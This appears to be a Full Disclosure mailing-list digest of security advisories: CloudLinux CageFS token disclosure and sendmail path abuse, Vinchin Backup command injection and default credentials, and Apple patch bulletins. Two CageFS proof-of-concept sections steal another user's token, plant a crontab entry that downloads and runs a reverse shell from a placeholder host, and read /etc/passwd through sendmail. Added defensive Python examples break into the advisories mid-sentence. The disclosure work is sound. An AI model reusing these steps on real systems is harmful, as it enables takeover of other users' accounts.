[FD] [SBA-ADV-20200707-01] CVE-2020-36771: CloudLinux CageFS 7.1.1-1 or below Token Disclosure

2024-01-26 Thread SBA - Advisory via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

# CloudLinux CageFS Token Disclosure #

Link: 
https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure

## Vulnerability Overview ##

CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a
command line argument. In some configurations this allows local users to
view the authentication token via the process list and gain code execution
as another user.

* **Identifier**: SBA-ADV-20200707-01
* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)
* **Vendor**: CloudLinux Inc.
* **Affected Versions** : <= 7.1.1-1
* **Fixed in Version**  : 7.1.2-2
* **CVE ID**: CVE-2020-36771
* **CVSS Vector**   : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
* **CVSS Base Score**   : 7.8 (High)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves
> server stability, density, and security by isolating each tenant and
> giving them allocated server resources. This creates an environment
> that feels more like a virtual server than a shared hosting account.
> By doing so, CloudLinux OS reduces operating costs and churn rates,
> and increases profitability.

Source: 

## Impact ##

If the `lve_namespaces` service or the virtualized proc filesystem
feature is disabled, a local user can obtain the CageFS authentication
token of other users by exploiting the vulnerability documented in this
advisory. In most configurations this allows attackers to gain code
execution as those users.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.
It allows limited execution of commands outside the CageFS environment from
a user restricted within the CageFS environment.

For this purpose a CageFS daemon runs outside of the CageFS environment,
it is accessible via a UNIX socket from within the CageFS environment.
The UNIX socket is handled by `proxyexec`. To make the whole process of
calling a tool outside of the CageFS transparent to the user, wrapper
scripts are placed within CageFS, which in turn call `proxyexec` for
execution of the commands outside of the CageFS environment.

Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`
and pass it to the `proxyexec` command as a command line argument.

CloudLinux by default enables the virtualized proc filesystem, which
prevents other users from seeing the CageFS token within the process
list. However, if the `lve_namespaces` service is disabled, e.g. the
systemd unit is masked out, or the virtualized proc filesystem is
explicitly disabled, other users can see the CageFS token within the
process list. They can use the CageFS token of other users to talk to
the CageFS daemon via `proxyexec` and the CageFS daemon executes the
commands with the privileges of the supplied authentication token.

## Proof of Concept ##

Let's assume the `lve_namespaces` service is disabled and we are user
`ftp2406151`:

```sh
$ id
uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)
```

We look at the process list and find another user executing `ping example.org`:

```sh
$ ps aux | grep proxyexec
 2094 root  0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server
1180646 934   0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642 example.org
1180647 root  0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server
1181229 ftp24061  0:00 grep proxyexec
```

We can now execute commands as user `ftp1488781` and, for example, view
the crontab:

```sh
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0
no crontab for ftp1488781
```

Now we set up a new crontab entry, which downloads a reverse shell and
executes it every minute:

```sh
$ echo '* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0
```

```sh
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0
* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &
```

Our shell connects back to us and we can execute arbitrary commands as
the other user:

```sh
$ nc -l -p 1234
id
uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)
```

## Recommended Countermeasures ##

We recommend avoiding passing sensitive information as a command line
argument. Instead, `proxyexec` should directly read the CageFS token
from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS
daemon via the UNIX socket.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version
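The process-list exposure this advisory describes, and the effect of the recommended fix, as an added Python example that is not CloudLinux or CageFS code: it spawns a hypothetical stand-in for the proxy client first with a constructed sample token in argv and then with the token handed over a pipe, and reads the child's command line the way any local user's `ps` would. The child programs and the token are assumptions for the demonstration.

```python
"""Why a token in argv leaks: added example, not CloudLinux/CageFS code.

Spawns a stand-in for the proxyexec client in two ways and inspects its
command line the way any local user would (ps / /proc/<pid>/cmdline)."""
import os
import subprocess
import sys

# Constructed sample token of the same shape as the one in the advisory; not a real value.
SAMPLE_TOKEN = "ExampleTok3n0000"

# Hypothetical stand-ins for the proxy client: they only idle so we can look at them.
IDLE_CHILD = "import time; time.sleep(30)"
PIPE_CHILD = "import sys, time; token = sys.stdin.readline(); time.sleep(30)"


def process_cmdline(pid):
    """Return the command line of `pid` as the process list shows it.

    Uses /proc/<pid>/cmdline where procfs exists (what `ps aux` reads on
    Linux) and falls back to `ps -o args=` elsewhere."""
    proc_path = f"/proc/{pid}/cmdline"
    if os.path.exists(proc_path):
        with open(proc_path, "rb") as fh:
            raw = fh.read()
        return [a.decode("utf-8", "replace") for a in raw.split(b"\0") if a]
    out = subprocess.run(["ps", "-o", "args=", "-p", str(pid)],
                         capture_output=True, text=True, check=False).stdout
    return out.split()


def token_visible_when_passed_in_argv(token):
    """Vulnerable pattern from the advisory: the wrapper script puts the token
    on the proxy client's command line, so it sits in argv of a live process
    and is readable by anyone who can read that process's cmdline."""
    child = subprocess.Popen([sys.executable, "-c", IDLE_CHILD, token])
    try:
        return token in process_cmdline(child.pid)
    finally:
        child.kill()
        child.wait()


def token_visible_when_passed_over_pipe(token):
    """Mitigated pattern: the token travels over a private channel (stdin here;
    the advisory recommends that proxyexec read the token file itself and send
    it over the UNIX socket). argv never contains it."""
    child = subprocess.Popen([sys.executable, "-c", PIPE_CHILD],
                             stdin=subprocess.PIPE)
    try:
        child.stdin.write((token + "\n").encode())
        child.stdin.flush()
        return token in process_cmdline(child.pid)
    finally:
        child.kill()
        child.wait()


if __name__ == "__main__":
    argv_leak = token_visible_when_passed_in_argv(SAMPLE_TOKEN)
    pipe_leak = token_visible_when_passed_over_pipe(SAMPLE_TOKEN)
    print("token in argv :", "visible in process list" if argv_leak else "hidden")
    print("token via pipe:", "visible in process list" if pipe_leak else "hidden")
```

On a host with the virtualized proc filesystem disabled, the first case is exactly what the `ps aux | grep proxyexec` listing above shows; the second is what the countermeasure achieves.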

[FD] [SBA-ADV-20200707-02] CVE-2020-36772: CloudLinux CageFS 7.0.8-2 or below Insufficiently Restricted Proxy Command

2024-01-26 Thread SBA - Advisory via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

# CloudLinux CageFS Insufficiently Restricted Proxy Command #

Link: 
https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands

## Vulnerability Overview ##

CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths
supplied to the `sendmail` proxy command. This allows local users to read
and write arbitrary files of certain file formats outside the CageFS
environment.

* **Identifier**: SBA-ADV-20200707-02
* **Type of Vulnerability** : External Control of File Name or Path
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)
* **Vendor**: CloudLinux Inc.
* **Affected Versions** : <= 7.0.8-2
* **Fixed in Version**  : 7.1.1-1
* **CVE ID**: CVE-2020-36772
* **CVSS Vector**   : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
* **CVSS Base Score**   : 6.6 (Medium)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves
> server stability, density, and security by isolating each tenant and
> giving them allocated server resources. This creates an environment
> that feels more like a virtual server than a shared hosting account.
> By doing so, CloudLinux OS reduces operating costs and churn rates,
> and increases profitability.

Source: 

## Impact ##

A CageFS-restricted local user can read and write arbitrary files of certain
file formats outside the CageFS environment by exploiting the vulnerability
documented in this advisory.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.
It allows limited execution of commands outside the CageFS environment from
a user restricted within the CageFS environment.

CageFS allows in its default configuration to execute `sendmail` as a proxy
command outside the CageFS environment. This default configuration is
designed to allow local programs to send emails by invoking `sendmail`.
Due to the insufficient validation of sendmail's arguments an attacker can
invoke other sendmail functionality as well. While CageFS applies some
restrictions to the allowed arguments, it does not restrict or validate the
`-bi` and `-oA` arguments.

Therefore, an attacker can have `sendmail` access arbitrary files which will
be interpreted as alias database files by enabling the `newalias` mode of
`sendmail` with `-bi` and specifying a file located outside the CageFS
environment with `-oA`.

On systems using the Postfix to Sendmail compatibility interface, a great
number of different alias database types can be used to craft exploits.
The compatibility interface internally calls `postalias` and besides the
`-oA` argument already being dangerous by itself, it also suffers from an
argument injection issue, which allows injection of additional Postfix
specific arguments for `postalias`. However, this is not a security issue
in Postfix.

According to Postfix developers, Postfix's `sendmail` does not enforce a
security policy on command-line arguments. Instead, it relies on the
UNIX/Linux system to enforce access policies based on the effective user and
group IDs of the process. If a security policy should be enforced, the
calling process must sanitize the command-line arguments before they are
given to `sendmail`. This includes but is not limited to sanity checks on
pathnames, and if applicable sanity checks on file contents in a way that
is not vulnerable to time-of-check to time-of-use race attacks, and
disabling options processing with `--`.

## Proof of Concept ##

For example, an attacker can read arbitrary files that at least partially
follow the structure `key  value` via the lookup table type
`texthash`:

```sh
$ sendmail -bi -oA'-s,-f,texthash:/etc/passwd'
postalias: warning: /etc/passwd, line 1: expected format: key whitespace value -- ignoring this line
[...]
postalias: warning: /etc/passwd, line 211: expected format: key whitespace value -- ignoring this line
sssd:x:496:493:User:for sssd:/:/sbin/nologin
dbus:x:81:81:System:message bus:/:/sbin/nologin
polkitd:x:497:495:User: for polkitd:/:/sbin/nologin
tss:x:59:59:Account:used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
systemd-resolve:x:193:193:systemd:  Resolver:/:/sbin/nologin
rngd:x:494:491:Random:  Number Generator Daemon:/var/lib/rngd:/sbin/nologin
sshd:x:74:74:Privilege-separated:   SSH:/var/empty/sshd:/sbin/nologin
systemd-coredump:x:499:497:systemd: Core Dumper:/:/sbin/nologin
nobody:x:65534:65534:Kernel:Overflow User:/:/sbin/nologin
ftp:x:14:50:FTP:User:/var/ftp:/sbin/nologin
unbound:x:498:496:Unbound:  DNS resolver:/etc/unbound:/sbin/nologin
nrpe:x:492:486:NRPE:user for the NRPE service:/var/run/nrpe:/sbin/nologin
```

The attacker can also use other lookup table types which might disclose
sensitive infor
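The Postfix developers' advice quoted in the description (the caller sanitizes arguments, checks pathnames, and ends option processing with `--`) applied to a proxy wrapper, as an added Python example that is not CageFS or Postfix code: an allow-list sanitizer that lets a mail-sending program pass only a handful of flags and plain addresses, so the `-bi`/`-oA` vector from the proof of concept never reaches `sendmail`. The allow-list contents are an assumption to adjust per site.

```python
"""Argument allow-list for a sendmail proxy wrapper: added example, not CageFS code.

The caller, not sendmail, decides which options are acceptable, validates
everything else as a plain address, and terminates option processing with
`--`. The allow-list is an assumption; adjust it to what your programs need."""
import re

# Flags a typical mail-sending program needs and that take no value.
FLAGS_ALLOWED = {"-t", "-i", "-oi"}
# Flags that take a value; only the envelope sender is allowed, as an address.
VALUE_FLAGS_ALLOWED = {"-f"}
# Deliberately strict "plain address" shape: no spaces, no shell metacharacters.
ADDRESS_RE = re.compile(
    r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~.-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


class RejectedArgument(ValueError):
    """Raised for any argument the wrapper is not willing to pass through."""


def _address(value):
    if not ADDRESS_RE.fullmatch(value):
        raise RejectedArgument(f"not a plain mail address: {value!r}")
    return value


def sanitize_sendmail_args(argv):
    """Return the argument list to hand to sendmail, or raise RejectedArgument.

    No file name ever reaches sendmail, so there is nothing to check on disk
    and no time-of-check/time-of-use window to worry about."""
    options, recipients = [], []
    args = list(argv)
    i = 0
    while i < len(args):
        arg = args[i]
        if arg == "--":                          # caller already ended options
            recipients.extend(args[i + 1:])
            break
        if arg.startswith("-"):
            if arg in FLAGS_ALLOWED:
                options.append(arg)
            elif arg in VALUE_FLAGS_ALLOWED:     # separate form: -f sender
                if i + 1 >= len(args):
                    raise RejectedArgument(f"{arg} needs a value")
                options += [arg, _address(args[i + 1])]
                i += 1
            elif arg[:2] in VALUE_FLAGS_ALLOWED:  # attached form: -fsender
                options += [arg[:2], _address(arg[2:])]
            else:
                # Everything else is refused, which covers -bi, -oA<path>,
                # -C<config> and any option sendmail grows later on.
                raise RejectedArgument(f"option not permitted: {arg!r}")
        else:
            recipients.append(arg)
        i += 1
    # "--" guarantees a recipient that begins with "-" is never parsed as an option.
    return options + ["--"] + [_address(r) for r in recipients]


def rejects(argv):
    """True if the wrapper would refuse this argument vector."""
    try:
        sanitize_sendmail_args(argv)
    except RejectedArgument:
        return True
    return False


if __name__ == "__main__":
    # The advisory's proof-of-concept vector is refused outright.
    print(rejects(["-bi", "-oA-s,-f,texthash:/etc/passwd"]))
    print(sanitize_sendmail_args(["-t", "-i", "-f", "bounce@example.org"]))
```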

[FD] [Full Disclosure] CVE-2024-22900: Unpatched Command Injection in Vinchin Backup and Recovery Versions 7.2 and Earlier

2024-01-26 Thread Balgogan via Fulldisclosure
CVE ID: CVE-2024-22900

Title: Command Injection Vulnerability in Vinchin Backup and Recovery Versions 
7.2 and Earlier

Description:
A critical security vulnerability, identified as CVE-2024-22900, has been 
discovered in Vinchin Backup and Recovery software, affecting versions 7.2 and 
earlier. The vulnerability is present in the `setNetworkCardInfo` function, 
which is intended to update network card information.

Details:
1. The function collects the `NAME` parameter from the user request and assigns 
it to a variable `$name`.
2. The `NAME` parameter value is then used to construct a file path in the 
`setNetworkCardInfo` function, leading to potential command injection.
3. The vulnerability arises from the use of user-supplied input in system 
commands without proper validation and sanitization.

Impact:
This vulnerability allows an attacker to inject arbitrary commands via the 
`NAME` parameter, potentially leading to unauthorized access or control over 
the affected system.

Current Status:
As of the current date, there is no known patch available for this 
vulnerability. Users of Vinchin Backup and Recovery versions 7.2 and earlier 
are at risk.

Recommendation:
It is strongly recommended that users of the affected software versions remain 
vigilant and monitor Vinchin's updates for a security patch. Upon release of a 
patch, users should prioritize updating their systems to mitigate this security 
risk.

Signed, Valentin Lobstein
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


[FD] [Full Disclosure] CVE-2024-22899: Unpatched Command Injection in Vinchin Backup and Recovery Versions 7.2 and Earlier

2024-01-26 Thread Valentin Lobstein via Fulldisclosure
CVE ID: CVE-2024-22899

Title: Command Injection Vulnerability in Vinchin Backup and Recovery's 
syncNtpTime Function in Versions 7.2 and Earlier

Description:
A critical security vulnerability, identified as CVE-2024-22899, has been 
discovered in the `syncNtpTime` function of Vinchin Backup and Recovery 
software. This issue affects versions 7.2 and earlier. The function, part of 
the `SystemHandler.class.php` file, is designed for synchronizing system time 
with NTP servers but is prone to a command injection vulnerability due to 
improper handling of user input.

Function Analysis:
- The function is responsible for handling the `ntphost` parameter, which is 
expected to contain the address of the NTP server.
- The vulnerability stems from the direct concatenation of this parameter into 
a system command line, without adequate validation or sanitization.
- This design flaw allows an attacker to inject arbitrary commands into the 
`ntphost` parameter, which are then executed by the system.

Current Status:
As of now, there is no patch available for this vulnerability in versions 7.2 
and earlier of Vinchin Backup and Recovery. Users of these versions are at risk 
of exploitation.

Recommendation:
It is advised for users of Vinchin Backup and Recovery versions 7.2 and earlier 
to remain alert and monitor for updates from Vinchin. Once a patch becomes 
available, it should be applied immediately to mitigate the risk posed by this 
vulnerability.

Conclusion:
The discovery of CVE-2024-22899 underscores the importance of rigorous input 
validation and sanitization in software development. This vulnerability poses a 
severe security risk, potentially leading to unauthorized system access or 
control.

Signed, Valentin Lobstein


[FD] [Full Disclosure] CVE-2024-22901: Default MYSQL Credentials in Vinchin Backup & Recovery v7.2 and Earlier

2024-01-26 Thread Valentin Lobstein via Fulldisclosure
CVE ID: CVE-2024-22901

Title: Default MYSQL Credentials Vulnerability in Vinchin Backup & Recovery v7.2

Description:
A critical security issue, identified as CVE-2024-22901, has been discovered in 
Vinchin Backup & Recovery version 7.2. The software has been found to use 
default MYSQL credentials, which could lead to significant security risks.

Additional Information:
Vinchin has not addressed previous disclosures, including CVE-2022-35866, and 
has not patched the reported vulnerabilities. The presence of these unresolved 
issues, now compounded by the newly discovered vulnerability of default MYSQL 
credentials, opens up potential avenues for easy unauthenticated Remote Code 
Execution (RCE). This lack of response is alarming for a product that is 
certified in cybersecurity and poses a considerable risk to its users.

Vulnerability Type:
Incorrect Access Control

Vendor of Product:
Vinchin

Affected Product Code Base:
Vinchin Backup & Recovery - Version 7.2

Affected Component:
The MySQL database used by Vinchin Backup & Recovery

Attack Type:
Remote

Impact - Escalation of Privileges:
True

Attack Vectors:
The vulnerability can be exploited via local or remote access, utilizing the 
unpatched default MySQL credentials.

Discoverer:
Valentin Lobstein

Reference:
http://vinchin.com

Conclusion:
The discovery of CVE-2024-22901 highlights a critical oversight in Vinchin 
Backup & Recovery's security posture. Users are advised to be cautious and to 
monitor for any updates or patches from Vinchin, which should be applied 
immediately to mitigate this risk.

Signed, Valentin Lobstein


[FD] [Full Disclosure] CVE-2024-22902: Default Root Credentials in Vinchin Backup & Recovery v7.2 and Earlier

2024-01-26 Thread Valentin Lobstein via Fulldisclosure
CVE ID: CVE-2024-22902

Title: Default Root Credentials Vulnerability in Vinchin Backup & Recovery v7.2

Suggested Description:
Vinchin Backup & Recovery version 7.2 has been identified as being configured 
with default root credentials, posing a significant security vulnerability.

Additional Information:
There is no documentation or guidance from Vinchin on changing the root 
password for this version. The use of password authentication as root is 
possible, leading to potential unauthorized access.

Vulnerability Type:
Incorrect Access Control

Vendor of Product:
Vinchin

Affected Product Code Base:
Vinchin - Version 7.2

Attack Type:
Remote

Impact - Escalation of Privileges:
True

Attack Vectors:
This security flaw can be exploited through both local and remote access using 
the default root credentials provided in the software.

Discoverer:
Valentin Lobstein

References:
- http://vinchin.com

Conclusion:
The existence of default root credentials in Vinchin Backup & Recovery v7.2 
(CVE-2024-22902) is a serious security oversight. Users of this software 
version should be aware of the risks and stay alert for any updates or security 
patches from Vinchin. Immediate action should be taken to change these 
credentials to prevent unauthorized access.

Signed, Valentin Lobstein


[FD] [Full Disclosure] CVE-2024-22903: Unpatched Command Injection in Vinchin Backup & Recovery Versions 7.2 and Earlier

2024-01-26 Thread Valentin Lobstein via Fulldisclosure
CVE ID: CVE-2024-22903

Title: Command Injection Vulnerability in SystemHandler.class.php of Vinchin 
Backup & Recovery Versions 7.2 and Earlier

Description:
A significant security vulnerability, CVE-2024-22903, has been identified in 
the `deleteUpdateAPK` function within the `SystemHandler.class.php` file of 
Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This 
function, designed to delete APK files, is prone to a command injection 
vulnerability due to improper handling of input parameters.

Function Analysis:
- The function extracts `md5` and `file_name` parameters from user input.
- It includes a check for an empty `file_name`, but lacks adequate validation 
or sanitization for the input used in constructing system commands.
- The command to delete the specified APK file, built using the `file_name` 
parameter, is executed via the `exec` function, leading to a security 
vulnerability.

Exploitation Risk:
Attackers can exploit this flaw by inserting malicious commands in the 
`file_name` parameter. When this parameter is processed by the vulnerable 
function, the injected commands are executed on the server, presenting a severe 
risk of unauthorized access or control.

Current Status:
As of the latest information, there is no known patch available for this 
vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery.

Recommendation:
Users are urged to be vigilant and to monitor Vinchin for any security updates. 
Until a patch is released, implementing additional security controls and 
closely monitoring system activity is crucial for mitigating the risk posed by 
this vulnerability.

Signed, Valentin Lobstein


[FD] APPLE-SA-01-22-2024-1 Safari 17.3

2024-01-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-1 Safari 17.3

Safari 17.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214056.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Safari
Available for: macOS Monterey and macOS Ventura
Impact: A user's private browsing activity may be visible in Settings
Description: A privacy issue was addressed with improved handling of
user preferences.
CVE-2024-23211: Mark Bowers

WebKit
Available for: macOS Monterey and macOS Ventura
Impact: A maliciously crafted webpage may be able to fingerprint the
user
Description: An access issue was addressed with improved access
restrictions.
WebKit Bugzilla: 262699
CVE-2024-23206: an anonymous researcher

WebKit
Available for: macOS Monterey and macOS Ventura
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
WebKit Bugzilla: 266619
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit
Available for: macOS Monterey and macOS Ventura
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

Safari 17.3 may be obtained from the Mac App Store.
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/


[FD] APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3

2024-01-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3

iOS 17.3 and iPadOS 17.3 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214059.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Apple Neural Engine
Available for devices with Apple Neural Engine: iPhone XS and later,
iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st
generation and later, iPad Air 3rd generation and later, iPad 8th
generation and later, and iPad mini 5th generation and later
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

CoreCrypto
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5
ciphertexts without having the private key
Description: A timing side-channel issue was addressed with improvements
to constant-time computation in cryptographic functions.
CVE-2024-23218: Clemens Lang

Kernel
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team of
Legendsec at QI-ANXIN Group

Mail Search
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An app may be able to access sensitive user data
Description: This issue was addressed with improved redaction of
sensitive information.
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and
Ian de Marcellus

NSSpellChecker
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved handling of
files.
CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Reset Services
Available for: iPhone XS and later
Impact: Stolen Device Protection may be unexpectedly disabled
Description: The issue was addressed with improved authentication.
CVE-2024-23219: Peter Watthey and Christian Scalese

Safari
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: A user's private browsing activity may be visible in Settings
Description: A privacy issue was addressed with improved handling of
user preferences.
CVE-2024-23211: Mark Bowers

Shortcuts
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: A shortcut may be able to use sensitive data with certain
actions without prompting the user
Description: The issue was addressed with additional permissions checks.
CVE-2024-23203: an anonymous researcher
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An app may be able to bypass certain Privacy preferences
Description: A privacy issue was addressed with improved handling of
temporary files.
CVE-2024-23217: Kirin (@Pwnrin)

TCC
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation
and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and
later, iPad Air 3rd generation and later, iPad 6th generation and later,
and iPad mini 5th generation and later
Impact: An app may be able to access user-sensitive data
Description: An issue was addressed with improved handling of temporary
files.
CVE-2024-23215: Zhongquan Li (@Guluisacat)

Time Zone
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation

[FD] APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5

2024-01-26 Thread Apple Product Security via Fulldisclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5

iOS 16.7.5 and iPadOS 16.7.5 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/kb/HT214063.

Apple maintains a Security Updates page at
https://support.apple.com/HT201222 which lists recent
software updates with security advisories.

Accessibility
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: An app may be able to access sensitive user data
Description: A privacy issue was addressed with improved private data
redaction for log entries.
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Apple Neural Engine
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2024-23212: Ye Zhang of Baidu Security

curl
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: Multiple issues in curl
Description: Multiple issues were addressed by updating to curl version
8.4.0.
CVE-2023-38545
CVE-2023-38039
CVE-2023-38546
CVE-2023-42915

ImageIO
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: Processing a maliciously crafted image may result in disclosure
of process memory
Description: The issue was addressed with improved checks.
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day
Initiative

Safari
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: A user's private browsing activity may be visible in Settings
Description: A privacy issue was addressed with improved handling of
user preferences.
CVE-2024-23211: Mark Bowers

WebKit
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: Processing web content may lead to arbitrary code execution
Description: The issue was addressed with improved memory handling.
WebKit Bugzilla: 266619
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
WebKit Bugzilla: 265129
CVE-2024-23214: Nan Wang (@eternalsakura13) of 360 Vulnerability
Research Institute

WebKit
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: A maliciously crafted webpage may be able to fingerprint the
user
Description: An access issue was addressed with improved access
restrictions.
WebKit Bugzilla: 262699
CVE-2024-23206: an anonymous researcher

WebKit
Available for: iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation,
iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
Impact: Processing maliciously crafted web content may lead to arbitrary
code execution. Apple is aware of a report that this issue may have been
exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222

This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/

iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is presented
to the user when the iOS device is docked. We recommend applying the
update immediately if possible. Selecting Don't Install will present
the option the next time you connect your iOS device.

The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
